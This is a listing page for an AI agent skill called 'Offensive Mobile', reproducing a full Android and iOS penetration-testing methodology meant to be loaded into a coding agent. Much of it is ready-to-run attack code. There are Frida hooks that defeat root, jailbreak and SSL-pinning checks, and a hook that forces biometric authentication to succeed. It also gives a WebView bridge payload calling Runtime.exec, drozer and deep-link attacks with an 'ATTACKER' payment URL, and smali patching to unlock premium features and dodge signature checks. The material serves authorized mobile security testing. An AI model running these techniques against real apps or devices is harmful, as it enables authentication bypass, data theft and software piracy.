Agent skill

Offensive Mobile

by SnailSploit in SnailSploit/Claude-Red

Mobile (Android + iOS) application penetration testing methodology.

MITAuto-check passedSecurity

Install Offensive Mobile

skills CLI
$ npx skills add SnailSploit/Claude-Red --skill offensive-mobile -a claude-code

Project install by default; add -g for ~/.claude/skills/.

GitHub CLI
$ gh skill install SnailSploit/Claude-Red offensive-mobile --agent claude-code

Project scope by default; add --scope user for a personal install. Needs GitHub CLI 2.90.0 or later (public preview).

Manual copy
$ git clone --depth 1 https://github.com/SnailSploit/Claude-Red.git skills-src && mkdir -p .claude/skills && cp -r skills-src/Skills/mobile/offensive-mobile .claude/skills/offensive-mobile && rm -rf skills-src

Use ~/.claude/skills/ instead of .claude/skills for a personal install. The folder must contain SKILL.md.

Claude Code skills documentation · loads skills from .claude/skills/

Facts

Skill name
offensive-mobile
GitHub stars
7.3k
Token cost
~3.5k tokens
SKILL.md length
820 words
Files
1
Skills in repo
10
Repo updated
First seen
Licence
MIT

At a glance

Mobile (Android + iOS) application penetration testing methodology.

  • Works in 5 steps: Static: pull the IPA/APK, decompile,… → Dynamic: install on rooted/jailbroken… → Map exported attack surface: deep links,… → …
  • Bug bounty mobile triage
  • SKILL.md covers Quick Workflow, Lab Setup, Static Analysis and Dynamic Analysis & Frida, plus 5 more sections
  • Calls adb, firebase and xcrun; reaches target-app.firebaseio.com

What it does

Offensive Mobile is an agent skill from SnailSploit/Claude-Red. Mobile (Android + iOS) application penetration testing methodology. Covers static analysis (apktool/jadx for Android, class-dump/Hopper/IDA for iOS), dynamic instrumentation with Frida and Objection, SSL pinning bypass strategies, root/jailbreak detection bypass, deep-link / URL-scheme abuse, exported component attacks (Android activities, services, providers, receivers; iOS XPC, URL schemes, universal links), insecure data storage (SharedPrefs, KeyStore misuse, NSUserDefaults, Keychain ACL bypass), IPC / Intent…

Its SKILL.md is about 3.5k tokens, which your agent loads only when the skill is triggered. It is a single SKILL.md file with no bundled scripts.

It sits in Security, covering Mobile application security, Bug bounty and Static analysis and SAST. It works with iOS, Android, Frida and Amazon Web Services. The repository describes itself as: claude-red is a curated library of offensive security skills designed for the Claude skills system. Each skill is a structured SKILL.md file that primes Claude with expert-level… The licence is MIT.

When your agent uses it

  • Bug bounty mobile triage
  • App-store reconnaissance

Example prompts

  • “/offensive-mobile”

Workflow steps

5 steps, taken from the first numbered list in SKILL.md.

  1. Static: pull the IPA/APK, decompile, dump resources/strings, identify endpoints
  2. Dynamic: install on rooted/jailbroken device, hook with Frida, intercept TLS
  3. Map exported attack surface: deep links, URL schemes, exported components
  4. Storage / Keystore audit: where do secrets live, what protects them
  5. API: every backend the app talks to is your scope — test like a web app

What it can do on your machine

Read from SKILL.md and the folder at commit 739512a. It shows what the files ask for, not the result of running them.

  • Tool permissions

    Pre-approves nothing: there is no allowed-tools line, so your agent's usual permission prompts apply.

    From allowed-tools in the SKILL.md frontmatter.

  • Runs code

    Shell commands in SKILL.md call:

    • adb
    • firebase
    • xcrun
    • curl
    • gitleaks

    From the folder's file list and the shell code blocks in SKILL.md.

  • Network

    Hosts in commands or code, which the agent is likely to contact:

    • target-app.firebaseio.com

    Also links to:

    • github.com

    From URLs in SKILL.md, links to its own repository left out.

  • Credentials

    Names no API keys, tokens, secrets or passwords.

    From names ending in _API_KEY, _TOKEN, _SECRET, _KEY or _PASSWORD in SKILL.md.

Context cost

Offensive Mobile loads about 3.5k tokens when it runs. Until then it costs about 217 tokens; SKILL.md has 820 words of instructions outside code blocks.

Always · name and description, kept in context so the agent knows when to use it
~217
When it runs · the whole SKILL.md, loaded when a task matches
~3.5k

Estimates: characters ÷ 4, the usual rule of thumb; real counts depend on the model's tokenizer. Scripts and assets cost tokens only if the agent reads them.

Safety

Auto-check passed

The automated check found no risky patterns in SKILL.md.

Automated static check — not a guarantee. Review scripts before installing. It scans the text of SKILL.md for risky patterns (piping downloads into a shell, reading credential files, hidden Unicode, destructive commands); files beside SKILL.md are not scanned.

SKILL.md

The full file from SnailSploit/Claude-Red at commit 739512a, republished under its MIT licence (© SnailSploit). 820 words, ~3,489 tokens.

Download SKILL.mdSave it as .claude/skills/offensive-mobile/SKILL.md (or your agent's skills folder).
name
offensive-mobile
description
Mobile (Android + iOS) application penetration testing methodology. Covers static analysis (apktool/jadx for Android, class-dump/Hopper/IDA for iOS), dynamic instrumentation with Frida and Objection, SSL pinning bypass strategies, root/jailbreak detection bypass, deep-link / URL-scheme abuse, exported component attacks (Android activities, services, providers, receivers; iOS XPC, URL schemes, universal links), insecure data storage (SharedPrefs, KeyStore misuse, NSUserDefaults, Keychain ACL bypass), IPC / Intent redirection, WebView vulnerabilities (JavaScriptInterface, file:// access), Firebase/AWS/Azure misconfiguration leakage, mobile API testing, biometric/Face ID/Touch ID bypass, app-cloning and runtime patching, and mobile malware/RAT analysis primitives. Use for mobile pentest, bug bounty mobile triage, or app-store reconnaissance.

Mobile (Android + iOS) — Offensive Testing Methodology

Quick Workflow

  1. Static: pull the IPA/APK, decompile, dump resources/strings, identify endpoints
  2. Dynamic: install on rooted/jailbroken device, hook with Frida, intercept TLS
  3. Map exported attack surface: deep links, URL schemes, exported components
  4. Storage / Keystore audit: where do secrets live, what protects them
  5. API: every backend the app talks to is your scope — test like a web app

Lab Setup

Android
  • Rooted device or Genymotion / Android Studio AVD with userdebug build
  • Magisk for systemless root; LSPosed for hooks; Frida server matching device arch
  • Burp / Mitmproxy with system-trusted CA via Magisk module (MagiskTrustUserCerts)
iOS
  • Jailbroken device (palera1n / checkra1n / Dopamine depending on iOS version)
  • Frida + Objection + Filza + SSH via USB (iproxy 2222 22)
  • Burp CA installed via Settings → General → Device Management → Certificate Trust Settings

Static Analysis

Android
bash
# Decode resources + smali
apktool d app.apk -o app

# Decompile to Java
jadx -d app_src app.apk

# Manifest review
xmllint --format app/AndroidManifest.xml | less
# Look for: android:exported="true", intent-filters, custom permissions, debuggable, allowBackup, networkSecurityConfig
bash
# Secrets and endpoints
grep -rE '(https?://[a-z0-9.-]+|api[_-]?key|secret|token|firebase|amazonaws|appspot)' app_src/
grep -r "Log\.[dwief]" app_src/   # leftover debug logs

# Native libs
file app/lib/*/*.so
# RE in Ghidra/IDA; look for JNI_OnLoad and exported Java_* functions
iOS
bash
# Pull IPA from device
frida-ios-dump -o app.ipa "com.vendor.app"

# Or via App Store via 3rd-party tools (Apple Configurator with paid acct, etc.)
unzip app.ipa
# Decrypt if needed (jailbroken device): bagbak / clutch
bagbak com.vendor.app

# Class dump
class-dump-dyld -H Payload/App.app/App -o headers/
# Or for Swift symbols, use Hopper / IDA

# Strings / endpoints
strings -a Payload/App.app/App | grep -E '(https?://|key|secret|api)'
bash
# Info.plist analysis
plutil -p Payload/App.app/Info.plist
# Look for: NSAppTransportSecurity exceptions, CFBundleURLTypes (URL schemes),
# associated-domains entitlements, UIFileSharingEnabled, ATS exemptions

Dynamic Analysis & Frida

Common Hooks
javascript
// Bypass SSL pinning (Android — generic OkHttp/CertificatePinner/TrustManager)
Java.perform(() => {
  const X509TrustManager = Java.use('javax.net.ssl.X509TrustManager');
  const TrustManagerFactory = Java.use('javax.net.ssl.TrustManagerFactory');
  // ... full bypass scripts: codeshare.frida.re/@pcipolloni/universal-android-ssl-pinning-bypass-with-frida
});

// Bypass root detection
Java.perform(() => {
  const File = Java.use('java.io.File');
  File.exists.implementation = function () {
    const path = this.getAbsolutePath();
    if (path.includes('su') || path.includes('Magisk')) return false;
    return this.exists();
  };
});

// iOS — bypass jailbreak detection
const stat = Module.findExportByName(null, 'stat');
Interceptor.attach(stat, {
  onEnter(args) {
    const path = args[0].readUtf8String();
    if (/Cydia|jailbreak|substrate|frida/i.test(path)) {
      args[0] = Memory.allocUtf8String('/nonexistent');
    }
  }
});
Objection (Frida-based shortcuts)
bash
objection -g com.vendor.app explore
# Then inside:
android sslpinning disable
android root disable
android hooking list activities
android intent launch_activity com.vendor.app/.SecretActivity
ios sslpinning disable
ios jailbreak disable
ios keychain dump

SSL / TLS Interception

Android Network Security Config

App with <network-security-config> requiring its own pinned CA: edit res/xml/network_security_config.xml, repack:

bash
apktool b app -o app-patched.apk
apksigner sign --ks debug.keystore app-patched.apk

Or live-bypass with Frida (preferred — no recompile).

iOS ATS / Pinning

For pinning, use Frida hooks against SecTrustEvaluate* / NSURLSession delegate methods. ATS exceptions in Info.plist (NSAllowsArbitraryLoads) make MITM trivial without pinning.


Exported / IPC Attack Surface

Android — Exported Components
bash
drozer console connect
> run app.package.attacksurface com.vendor.app
> run app.activity.start --component com.vendor.app .ExportedActivity \
    --extra string url 'javascript:alert(1)'
> run app.provider.query content://com.vendor.app.provider/secrets

Targets:

  • exported="true" activities → call from another app, bypass auth
  • ContentProviders without grantUriPermissions → arbitrary read
  • Receivers handling BOOT_COMPLETED etc. with privileged actions
  • Services bound by intent extras → command injection
Intent Redirection / PendingIntent Hijack
java
// Vulnerable: PendingIntent with implicit Intent given to untrusted app
PendingIntent.getActivity(this, 0, new Intent(), FLAG_MUTABLE)
// Attacker fills the empty Intent → action runs with victim app's identity
bash
# Open custom scheme (test from another app)
plutil -p Payload/App.app/Info.plist | grep -A 5 CFBundleURLTypes
# Then on device:
xcrun simctl openurl booted "vendorapp://payment?to=ATTACKER&amount=9999"

Universal Links: check apple-app-site-association on the linked domain — open redirect on that domain → universal-link claim → in-app webview navigation.

iOS XPC / Mach Services

launchctl list | grep com.vendor enumerates the app's launch services. XPC handlers without proper audit-token validation accept messages from any process.


Insecure Data Storage

Android
bash
# On device (root), pull app data
adb shell "su -c 'tar -cz /data/data/com.vendor.app'" > app_data.tgz

Inspect:

  • shared_prefs/*.xml — preferences in plaintext
  • databases/*.db — SQLite (use sqlite3 to dump)
  • files/ — arbitrary writes
  • cache/ and external storage (sdcard/Android/data/...) — often readable across apps
Android Keystore Misuse
  • Keys created without setUserAuthenticationRequired(true) → use any time process is running
  • AES-GCM with reused IV (devs often hardcode IV)
  • RSA without proper padding (PKCS1 v1.5 vs OAEP)
iOS Keychain
bash
# Objection
ios keychain dump
# Look for kSecAttrAccessible values:
#   AlwaysThisDeviceOnly  → readable when phone locked (bad for secrets)
#   WhenUnlocked          → standard
#   AlwaysThisDeviceOnly  → bypasses screen lock

iOS Data Protection classes: NSFileProtectionNone files are readable on a jailbroken device even when locked.


WebView Vulnerabilities

Android addJavascriptInterface

If the app exposes a JS bridge with reflection-capable objects, JS in any loaded page = arbitrary Java method invocation.

javascript
// In a page loaded by the WebView
JSBridge.getClass().forName('java.lang.Runtime')
  .getMethod('exec', String).invoke(JSBridge.getClass().forName('java.lang.Runtime').getMethod('getRuntime').invoke(null), 'id')
file:// and Content://

WebView with setAllowFileAccessFromFileURLs(true) + a HTML attachment that the user opens → reads any file the app can.

iOS WKWebView
  • WKWebViewConfiguration.preferences.javaScriptCanOpenWindowsAutomatically
  • wkScriptMessageHandler exposed — same JS bridge concern as Android
  • File URL load with loadFileURL and broad allowingReadAccessTo directory

Biometric / Auth Bypass

Android BiometricPrompt

Apps using BiometricPrompt without binding the cryptographic operation to authentication can be bypassed by hooking the result callback.

javascript
Java.perform(() => {
  const Cb = Java.use('androidx.biometric.BiometricPrompt$AuthenticationCallback');
  Cb.onAuthenticationSucceeded.implementation = function (r) {
    return this.onAuthenticationSucceeded(r);  // accept whatever
  };
  Cb.onAuthenticationFailed.implementation = function () { /* ignore */ };
});
iOS LAContext

evaluatePolicy(.deviceOwnerAuthenticationWithBiometrics) — if the app trusts the boolean result without using a Keychain item bound to biometrics, you can flip it.

javascript
const LAContext = ObjC.classes.LAContext;
Interceptor.attach(LAContext['- evaluatePolicy:localizedReason:reply:'].implementation, {
  onEnter(args) {
    const cb = new ObjC.Block(args[4]);
    const orig = cb.implementation;
    cb.implementation = function(success, err) { orig.call(this, true, NULL); };
  }
});

The fix on the dev side is to use a biometric-bound key in the Keychain — the bypass above doesn't yield key access.


Firebase / Cloud Misconfig (highest hit-rate)

Firebase Realtime DB (still common)

Pull URL from app:

bash
strings app.apk | grep -E "https://[a-z0-9-]+\.firebaseio\.com"
# Test for unauth read
curl https://target-app.firebaseio.com/.json
# If returns data → unauth read
Show full SKILL.md (327 more words)Show less
Firestore

Rules misconfigured to allow read, write: if true; — visible in app's REST calls. Test with anon SDK or direct REST.

S3 / GCS / Azure Blob

Unsigned URLs in API responses, or bucket names guessable from app package — test public-read, public-write, ACL.

Embedded API Keys

Google Maps key restricted properly? Stripe publishable vs secret? Twilio? AWS access keys in plaintext (still happens) → cloud takeover.

bash
truffleHog filesystem app_src/
gitleaks detect --source app_src/

Mobile API Testing

The backend is the same as a web app — pivot to web/API methodology once you've extracted the endpoints. Things specific to mobile:

  • Device-bound headers (X-Device-ID, X-App-Version, X-Signature) often calculable client-side. Pull the algorithm from the binary.
  • Request signing: HMAC with key embedded in app → game over, sign anything.
  • Mobile-only endpoints that skip rate limiting because they're "behind app authentication"
  • Older API versions still alive: /api/v1/... retired in newer app, server still serving with weaker auth.
  • Push notification topics: subscribing to /topics/<predictable> may receive messages meant for others (Firebase Messaging).

App Tampering & Repackaging

bash
# Patch a check (e.g. premium=true)
# Smali edit
sed -i 's/return-void/const\/4 v0, 0x1\n    return v0/' app/smali/com/vendor/Premium.smali
apktool b app -o patched.apk
apksigner sign --ks debug.keystore patched.apk
adb install -r patched.apk

For commercial bypasses, use LSPosed module so original APK isn't modified — bypasses signature checks that lock down repackaged variants.


iOS Specifics

Entitlements
bash
codesign -d --entitlements - Payload/App.app/App

Look for: keychain-access-groups (cross-app keychain), com.apple.security.application-groups (shared containers), com.apple.developer.associated-domains (universal links), private entitlements (rare).

URL Schemes from Other Apps
objc
[[UIApplication sharedApplication] openURL:[NSURL URLWithString:@"vendorapp://..."]];

Any app can invoke any registered URL scheme. Validate sender? Most don't.

App Groups Shared Container
/private/var/mobile/Containers/Shared/AppGroup/<UUID>/

Multiple apps from same vendor share — secrets here cross app boundary.


Detection / Defender View

DetectorBypass
Frida server detection (port 27042 open)Run frida-server on alt port, use frida -H
Magisk detection via /sbin/magiskMagisk Hide / DenyList
Emulator detectionRun on real device, or stub Build.FINGERPRINT etc.
iOS jailbreak detection (file existence)Frida hook stat / fopen / dlopen
Anti-debug ptrace(PT_DENY_ATTACH)Frida-stalker-based, or kernel patch
Certificate pinningFrida universal pinning bypass
App attestation (Play Integrity / DeviceCheck)Hard — usually requires server-side bypass or app attestation token relay

Engagement Checklist

[ ] Pull IPA/APK from device
[ ] Decompile / class-dump
[ ] Grep for endpoints, keys, tokens
[ ] Manifest / Info.plist review
[ ] Static-find exported components, deep links, URL schemes
[ ] Install on rooted/jailbroken; configure Frida
[ ] Bypass pinning, MITM all traffic
[ ] Test every API the app calls (web methodology)
[ ] Test exported components from another app / drozer / runtime
[ ] Inspect on-device storage (sharedprefs, sqlite, keychain)
[ ] Test biometric flows for unbound auth
[ ] Test deep links / URL schemes for auth bypass / open redirect / IDOR
[ ] Cloud config: Firebase rules, S3 buckets, signed URLs
[ ] Push topics / subscription model
[ ] Device-binding / signing scheme analysis

Key References

© SnailSploit, MIT. Rendered from Markdown: HTML in the file is shown as text, images as links, and headings moved down two levels. Raw file

Files

Just SKILL.md in Skills/mobile/offensive-mobile of SnailSploit/Claude-Red.

Open the folder on GitHubat commit 739512a

Compare with similar skills

Offensive Mobile next to the 5 skills that share the most tags, products or categories with it. Stars are the repository's; “used in” counts other GitHub owners with a copy.

Offensive Mobile compared with similar skills
SkillStarsUsed inTokensAuto-checkLicenceRepo updated
Offensive Mobile this skillSnailSploit/Claude-Red7.3k—~3.5kAutomated safety check: PassMIT
Mobile Security Experts7safe/android-h1210—~631Automated safety check: PassNone
Frida Mobile Securityindex-login/MobileRE-Skill111—~3kAutomated safety check: PassMIT
Mira Risk Collectvw2x/Mira105—~793Automated safety check: PassGPL-3.0
R0crawl Skillsmanyuegong33/r0crawl_skills305—~1.2kAutomated safety check: PassNone
Mobile Reversesickn33/agentic-awesome-skills47k1 repos~1.5kAutomated safety check: PassMIT

Similar skills

  • Mobile Security Expert

    s7safe/android-h1

    移动安全漏洞挖掘知识库,基于HackerOne公开报告提供Android和iOS应用的漏洞挖掘手法、技术细节和代码模式分析;用于安全研究人员和漏洞挖掘者学习参考、代码审计和漏洞检测指导。

    210 GitHub stars~631 tokensUpdated 5 mo ago
    SecurityAuto-check passed
  • Frida Mobile Security

    index-login/MobileRE-Skill

    用于 Android/iOS 移动应用安全逆向分析:Frida 动态插桩、绕过反调试/反注入/加固壳、脱壳、加密与 native SO 层 hook、运行时行为分析、jadx-mcp 静态攻击面分析、离线 SO 静态分析(ELF 侦察/字符串/交叉引用/反汇编/JNI 判型)。用户提到"绕过检测/闪退/脱壳/加密/抓包/行为摸底/内存扫描/分析 so/ELF…

    111 GitHub stars~3k tokensUpdated 7 days ago
    SecurityAuto-check passed
  • Run Mira environment risk collection. An agent skill from vw2x/Mira.

    105 GitHub stars~793 tokensUpdated 2 days ago
    SecurityAuto-check passed
  • R0crawl Skills

    manyuegong33/r0crawl_skills

    面向新手的全谱系逆向工程路由器,覆盖 Web/JavaScript、Android/iOS、Frida、脱壳、反分析、原生二进制、协议、固件、恶意软件、游戏、云 API、CTF、可复现一致性测试。用于逆向、起步、脱壳、反编译、hook、Frida、绕过检测、APK/SO/DEX/JS/PCAP/WASM/PE/ELF/Mach-O 分析、签名还原,或从样本到验证结果的完整调查。

    305 GitHub stars~1.2k tokensUpdated 17 days ago
    SecurityAuto-check passed
  • Mobile Reverse

    sickn33/agentic-awesome-skills

    Authorized Android/iOS application reverse engineering and security testing: APK/IPA analysis, runtime instrumentation (Frida/Objection), SSL-pinning and jailbreak/root-detection bypass, per OWASP…

    47k GitHub starsUsed in 1 repo~1.5k tokens
    SecurityAuto-check passed
  • Performing iOS App Security Assessment

    mukul975/Anthropic-Cybersecurity-Skills

    Performs comprehensive iOS application security assessments using Frida for dynamic instrumentation, Objection for runtime exploration, SSL pinning bypass for traffic interception, keychain…

    34k GitHub stars~3k tokensUpdated 1 mo ago
    SecurityAuto-check passed

More from SnailSploit/Claude-Red

All 10 skills in this repo
  • Offensive Krack Fragattacks

    SnailSploit/Claude-Red

    KRACK (CVE-2017-13077..082) and FragAttacks (CVE-2020-24586..588 + 26139-26147) — key reinstallation, fragmentation, and aggregation attacks against WPA2 supplicants.

    7.3k GitHub stars~1.1k tokensUpdated 18 days ago
    Auto-check: notes
  • Offensive Fuzzing

    SnailSploit/Claude-Red

    Practical offensive fuzzing methodology covering target identification, fuzzer selection (AFL++, libFuzzer, Honggfuzz, Boofuzz, syzkaller), harness writing, corpus curation, mutation strategies…

    7.3k GitHub stars~3k tokensUpdated 18 days ago
    Auto-check: warnings
  • Offensive Lorawan Sub Ghz

    SnailSploit/Claude-Red

    LoRaWAN and sub-GHz (433 / 868 / 915 MHz) attack methodology — LoRaWAN ABP/OTAA join attack, network/session key reuse, frame counter replay, downlink injection on TTN/Helium-style networks, sub-GHz…

    7.3k GitHub stars~1.7k tokensUpdated 18 days ago
    Auto-check passed
  • Offensive Wifi

    SnailSploit/Claude-Red

    Wireless / 802.11 attack methodology for red team engagements and wireless security assessments.

    7.3k GitHub stars~2.8k tokensUpdated 18 days ago
    Auto-check: notes
  • Offensive Wps

    SnailSploit/Claude-Red

    WPS (Wi-Fi Protected Setup) PIN attack methodology — Pixie Dust offline attack against vulnerable chipsets (Ralink, Realtek, Broadcom, MediaTek), online PIN brute-force with reaver/bully, lockout…

    7.3k GitHub stars~1.5k tokensUpdated 18 days ago
    Auto-check: notes
  • Offensive Z Wave

    SnailSploit/Claude-Red

    Z-Wave attack methodology — sniffing with Z-Force / EZ-Wave / RTL-SDR + ZniffMobile, S0 (legacy) network-key derivation flaw and key reuse, S2 (modern) ECDH commissioning analysis, replay/injection…

    7.3k GitHub stars~1.3k tokensUpdated 18 days ago
    Auto-check passed

Categories

Questions about Offensive Mobile

What does Offensive Mobile do?

Mobile (Android + iOS) application penetration testing methodology. Offensive Mobile is an agent skill from SnailSploit/Claude-Red. Mobile (Android + iOS) application penetration testing methodology.

When should I use Offensive Mobile?

Offensive Mobile fits situations like: bug bounty mobile triage; app-store reconnaissance.

How do I install Offensive Mobile in Claude Code?

Run `npx skills add SnailSploit/Claude-Red --skill offensive-mobile -a claude-code`. Or copy the skill folder (Skills/mobile/offensive-mobile in SnailSploit/Claude-Red) into .claude/skills/offensive-mobile in your project. Claude Code loads it when a task matches its description.

How do I install Offensive Mobile in Codex?

Run `npx skills add SnailSploit/Claude-Red --skill offensive-mobile -a codex`. Or copy the skill folder (Skills/mobile/offensive-mobile in SnailSploit/Claude-Red) into .agents/skills/offensive-mobile in your project. Codex loads it when a task matches its description.

Can I use Offensive Mobile in Cursor, Gemini CLI or GitHub Copilot?

Cursor, Gemini CLI, GitHub Copilot and OpenCode also load SKILL.md folders. With the skills CLI, run `npx skills add SnailSploit/Claude-Red --skill offensive-mobile -a cursor` (or -a gemini-cli, github-copilot or opencode for the others). To copy it by hand, put the folder in .cursor/skills/offensive-mobile, .gemini/skills/offensive-mobile, .github/skills/offensive-mobile and .opencode/skills/offensive-mobile in your project.

What does Offensive Mobile need to run?

Going by SKILL.md and its folder, Offensive Mobile needs the command-line tools its instructions call (adb, firebase, xcrun, curl and gitleaks).

Does Offensive Mobile access the network?

SKILL.md names 2 domains. In commands or code: target-app.firebaseio.com; the agent is likely to contact it when it follows the instructions. As links in the text: github.com. This is read from the text; nothing was executed.

Is Offensive Mobile safe to install?

Our automated static check of SKILL.md found no risky patterns, such as piping downloads into a shell, reading credential files or hidden Unicode. It is not a guarantee. Review the folder before installing.

What licence does Offensive Mobile use?

Offensive Mobile is published under the MIT licence (the repository's licence). It allows redistribution, so the full SKILL.md is shown on this page.

How many tokens does Offensive Mobile use?

About 3.5k tokens (SKILL.md is roughly 14k characters). Agents keep only the skill's name and description in context until a task matches; then they load SKILL.md in full.

What are the alternatives to Offensive Mobile?

Skills that share tags, products or a category with Offensive Mobile: Mobile Security Expert (s7safe/android-h1, 210 stars), Frida Mobile Security (index-login/MobileRE-Skill, 111 stars), Mira Risk Collect (vw2x/Mira, 105 stars) and R0crawl Skills (manyuegong33/r0crawl_skills, 305 stars). The comparison table on this page puts their stars, adoption, token cost, safety result and licence side by side.

Who maintains Offensive Mobile?

SnailSploit (a GitHub user) maintains it in SnailSploit/Claude-Red, which has 7,321 GitHub stars. The repository holds 10 skills in this directory. The repository was last updated on September 19, 2026.

Source: SnailSploit/Claude-Red on GitHub. Facts on this page come from the repository at the commit we read; the author's words are quoted as theirs.